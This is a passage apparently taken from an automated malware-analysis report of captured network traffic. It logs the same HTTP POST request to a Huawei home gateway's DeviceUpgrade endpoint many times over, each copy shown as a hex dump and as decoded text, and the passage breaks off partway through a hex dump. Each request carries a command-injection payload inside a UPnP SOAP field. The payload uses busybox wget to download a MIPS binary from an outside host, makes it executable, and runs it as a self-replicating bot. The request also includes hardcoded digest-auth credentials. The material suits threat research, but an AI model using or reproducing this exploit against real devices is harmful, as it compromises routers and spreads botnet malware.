69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 